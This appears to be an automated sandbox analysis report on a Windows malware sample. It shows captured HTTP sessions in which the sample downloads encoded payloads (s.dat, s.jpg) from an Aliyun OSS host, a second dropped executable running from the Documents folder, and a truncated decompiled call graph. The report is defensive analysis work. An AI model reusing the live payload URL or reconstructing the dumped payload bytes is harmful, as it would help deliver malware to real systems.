                                2025-01-08 09:11:29 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                2025-01-08 09:11:29 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.64997659.110.190.444436208C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                TimestampBytes transferredDirectionData
                                2025-01-08 09:11:37 UTC111OUTGET /s.dat HTTP/1.1
                                User-Agent: GetData
                                Host: basdy1.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-08 09:11:38 UTC560INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Wed, 08 Jan 2025 09:11:38 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 28272
                                Connection: close
                                x-oss-request-id: 677E4149E48B2B3937AEEDE6
                                Accept-Ranges: bytes
                                ETag: "B94911A8064BFE31A4B8AD111CA126C3"
                                Last-Modified: Wed, 08 Jan 2025 09:11:31 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 6813185489769507539
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000113
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: uUkRqAZL/jGkuK0RHKEmww==
                                x-oss-server-time: 10
                                2025-01-08 09:11:38 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                2025-01-08 09:11:38 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                2025-01-08 09:11:38 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                2025-01-08 09:11:38 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                2025-01-08 09:11:38 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                2025-01-08 09:11:38 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                Data Ascii: ,$LDld=5}u]U
                                2025-01-08 09:11:38 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                2025-01-08 09:11:38 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 e3 78 a0 cc
                                Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSx


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.64997759.110.190.444436208C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                TimestampBytes transferredDirectionData
                                2025-01-08 09:11:39 UTC111OUTGET /s.jpg HTTP/1.1
                                User-Agent: GetData
                                Host: basdy1.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-08 09:11:39 UTC543INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Wed, 08 Jan 2025 09:11:39 GMT
                                Content-Type: image/jpeg
                                Content-Length: 8299
                                Connection: close
                                x-oss-request-id: 677E414B5A53BB32324EA9C1
                                Accept-Ranges: bytes
                                ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                Last-Modified: Wed, 08 Jan 2025 03:41:24 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 692387538176721524
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                x-oss-server-time: 7
                                2025-01-08 09:11:39 UTC3553INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                2025-01-08 09:11:39 UTC4096INData Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5
                                Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                2025-01-08 09:11:39 UTC650INData Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90
                                Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:04:09:55
                                Start date:08/01/2025
                                Path:C:\Users\user\Desktop\e2664726330-76546233.05.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\e2664726330-76546233.05.exe"
                                Imagebase:0x140000000
                                File size:30'941'696 bytes
                                MD5 hash:B870E18FA5A2C9198E95C0D3B3B7DEE3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:5
                                Start time:04:11:39
                                Start date:08/01/2025
                                Path:C:\Users\user\Documents\XXiUpO.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\Documents\XXiUpO.exe
                                Imagebase:0x140000000
                                File size:133'136 bytes
                                MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, ReversingLabs
                                Reputation:moderate
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:2.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:32%
                                  Total number of Nodes:462
                                  Total number of Limit Nodes:7
                                  execution_graph 13951 140005df3 13952 140005e71 13951->13952 13953 140005e84 CreateFileA 13952->13953 13954 140005f50 _SetImageBase 13953->13954 13955 140005fc3 malloc ReadFile 13954->13955 15105 140007412 15106 140007333 15105->15106 15107 1400073e0 LdrLoadDll 15106->15107 15108 140007403 15106->15108 15107->15106 17131 7ffdac0911b0 17134 7ffdac091209 17131->17134 17132 7ffdac091b90 51 API calls 17136 7ffdac091300 BuildCatchObjectHelperInternal 17132->17136 17133 7ffdac091b70 _log10_special 8 API calls 17139 7ffdac0914d3 17133->17139 17134->17136 17137 7ffdac0912c7 17134->17137 17138 7ffdac09129e 17134->17138 17142 7ffdac0912b9 BuildCatchObjectHelperInternal 17134->17142 17149 7ffdac0914f0 17134->17149 17136->17133 17141 7ffdac091b90 51 API calls 17137->17141 17140 7ffdac0914f6 17138->17140 17150 7ffdac091b90 17138->17150 17167 7ffdac091110 17140->17167 17141->17142 17142->17132 17147 7ffdac0914eb 17159 7ffdac0979cc 17147->17159 17164 7ffdac091a40 17149->17164 17151 7ffdac091b9b 17150->17151 17152 7ffdac0912b0 17151->17152 17153 7ffdac097a4c _invalid_parameter_noinfo_noreturn 2 API calls 17151->17153 17155 7ffdac091bba 17151->17155 17152->17142 17152->17147 17153->17151 17154 7ffdac091bc5 17157 7ffdac091110 Concurrency::cancel_current_task 51 API calls 17154->17157 17155->17154 17173 7ffdac0921f0 17155->17173 17158 7ffdac091bcb 17157->17158 17160 7ffdac097844 _invalid_parameter_noinfo_noreturn 47 API calls 17159->17160 17161 7ffdac0979e5 17160->17161 17162 7ffdac0979fc _invalid_parameter_noinfo_noreturn 17 API calls 17161->17162 17163 7ffdac0979fa 17162->17163 17177 7ffdac091b34 17164->17177 17168 7ffdac09111e Concurrency::cancel_current_task 17167->17168 17169 7ffdac093990 Concurrency::cancel_current_task 2 API calls 17168->17169 17170 7ffdac09112f 17169->17170 17171 7ffdac09379c __std_exception_copy 49 API calls 17170->17171 17172 7ffdac091159 17171->17172 17174 7ffdac0921fe Concurrency::cancel_current_task 17173->17174 17175 7ffdac093990 Concurrency::cancel_current_task 2 API calls 17174->17175 17176 7ffdac09220f 17175->17176 17182 7ffdac091ab0 17177->17182 17180 7ffdac093990 Concurrency::cancel_current_task 2 API calls 17181 7ffdac091b56 17180->17181 17183 7ffdac09379c __std_exception_copy 49 API calls 17182->17183 17184 7ffdac091ae4 17183->17184 17184->17180 15819 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15822 1400054e0 15819->15822 15821 1400136ef 15823 14000552c 15822->15823 15826 140005506 sprintf_s 15822->15826 15824 1400074d0 LdrLoadDll 15823->15824 15825 140005536 15824->15825 15827 140008370 3 API calls 15825->15827 15826->15821 15830 140005545 _SetImageBase 15827->15830 15828 1400055b8 15829 140008de0 _lock 2 API calls 15828->15829 15832 1400055c0 sprintf_s 15829->15832 15830->15828 15831 1400074f0 LdrLoadDll 15830->15831 15833 140005561 CreateThread 15831->15833 15832->15826 15833->15832 15834 1400055b0 GetLastError 15833->15834 15834->15828 13960 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13961 140005ab1 13960->13961 13962 140005add GetVersionExA 13960->13962 13965 140005abf 13961->13965 14010 140009540 13961->14010 13963 140005b0e GetProcessHeap HeapFree 13962->13963 13964 140005af0 GetProcessHeap HeapFree 13962->13964 13971 140005b3c 13963->13971 13966 140005d0b 13964->13966 14018 140009300 13965->14018 13969 140005ac9 14029 140008510 GetModuleHandleA 13969->14029 14033 14000a310 HeapCreate 13971->14033 13973 140005ad3 13973->13966 13974 140005bec 13975 140005c12 13974->13975 13976 140005bf0 13974->13976 13980 140005c17 13975->13980 13977 140005bfe 13976->13977 13978 140009540 _lock 12 API calls 13976->13978 13979 140009300 _lock 10 API calls 13977->13979 13978->13977 13981 140005c08 13979->13981 13982 140005c3d 13980->13982 13984 140005c29 13980->13984 13986 140009540 _lock 12 API calls 13980->13986 13983 140008510 _lock 3 API calls 13981->13983 14036 140009f50 GetStartupInfoA 13982->14036 13983->13975 13985 140009300 _lock 10 API calls 13984->13985 13987 140005c33 13985->13987 13986->13984 13989 140008510 _lock 3 API calls 13987->13989 13989->13982 13991 140005c56 14056 140009e30 13991->14056 13994 140005c5b 14074 140009c30 13994->14074 13998 140005c81 14104 140009690 13998->14104 13999 140005c73 13999->13998 14000 1400084e0 _lock 12 API calls 13999->14000 14000->13998 14002 140005c86 14003 140005c94 14002->14003 14004 1400084e0 _lock 12 API calls 14002->14004 14116 140008650 14003->14116 14004->14003 14006 140005c9e 14007 1400084e0 _lock 12 API calls 14006->14007 14008 140005ca9 14006->14008 14007->14008 14120 140001520 14008->14120 14015 14000954e _lock 14010->14015 14011 14000959c 14013 140009300 _lock 10 API calls 14011->14013 14012 14000961c 14012->13965 14013->14012 14014 1400095c9 GetStdHandle 14014->14011 14016 1400095dc 14014->14016 14015->14011 14015->14012 14015->14014 14016->14011 14017 1400095e2 WriteFile 14016->14017 14017->14011 14022 140009320 _lock 14018->14022 14019 140009330 14019->13969 14020 1400094dc GetStdHandle 14020->14019 14021 1400094ef 14020->14021 14021->14019 14023 1400094f5 WriteFile 14021->14023 14022->14019 14022->14020 14024 140009375 _lock 14022->14024 14023->14019 14024->14019 14025 1400093b9 GetModuleFileNameA 14024->14025 14026 1400093d9 _lock 14025->14026 14138 14000f000 14026->14138 14030 140008543 ExitProcess 14029->14030 14031 14000852a GetProcAddress 14029->14031 14031->14030 14032 14000853f 14031->14032 14032->14030 14034 14000a334 14033->14034 14035 14000a339 HeapSetInformation 14033->14035 14034->13974 14035->13974 14164 140008370 14036->14164 14038 140005c48 14038->13991 14049 1400084e0 14038->14049 14039 140008370 3 API calls 14043 140009f8a 14039->14043 14040 14000a1c4 GetStdHandle 14046 14000a17c 14040->14046 14041 14000a239 SetHandleCount 14041->14038 14042 14000a1d8 GetFileType 14042->14046 14043->14038 14043->14039 14044 14000a0e3 14043->14044 14043->14046 14044->14038 14045 14000a11c GetFileType 14044->14045 14044->14046 14169 14000edc0 14044->14169 14045->14044 14046->14038 14046->14040 14046->14041 14046->14042 14048 14000edc0 _lock 3 API calls 14046->14048 14048->14046 14050 140009540 _lock 12 API calls 14049->14050 14051 1400084ed 14050->14051 14052 140009300 _lock 10 API calls 14051->14052 14053 1400084f4 14052->14053 14054 1400073e0 _lock LdrLoadDll 14053->14054 14055 140008500 14054->14055 14057 140009e7c 14056->14057 14058 140009e3e GetCommandLineW 14056->14058 14061 140009e81 GetCommandLineW 14057->14061 14062 140009e69 14057->14062 14059 140009e49 GetCommandLineW 14058->14059 14060 140009e5e GetLastError 14058->14060 14059->14060 14060->14062 14064 140009e75 14060->14064 14061->14062 14063 140009e91 GetCommandLineA MultiByteToWideChar 14062->14063 14062->14064 14065 140009ec8 14063->14065 14066 140009ed9 14063->14066 14064->13994 14065->13994 14067 140008370 3 API calls 14066->14067 14068 140009eeb 14067->14068 14069 140009f32 14068->14069 14070 140009ef3 MultiByteToWideChar 14068->14070 14069->13994 14071 140009f13 14070->14071 14072 140009f2a 14070->14072 14071->13994 14183 140008de0 14072->14183 14075 140009c52 GetEnvironmentStringsW 14074->14075 14076 140009c86 14074->14076 14077 140009c6c GetLastError 14075->14077 14083 140009c60 14075->14083 14078 140009c91 GetEnvironmentStringsW 14076->14078 14079 140009c77 14076->14079 14077->14076 14077->14079 14081 140005c67 14078->14081 14078->14083 14080 140009d09 GetEnvironmentStrings 14079->14080 14079->14081 14080->14081 14082 140009d17 14080->14082 14100 1400099c0 GetModuleFileNameW 14081->14100 14084 140009d58 14082->14084 14086 140009d20 MultiByteToWideChar 14082->14086 14083->14083 14188 140008300 14083->14188 14087 140008370 3 API calls 14084->14087 14086->14081 14086->14082 14089 140009d68 14087->14089 14092 140009d7d 14089->14092 14093 140009d70 FreeEnvironmentStringsA 14089->14093 14090 140009ce1 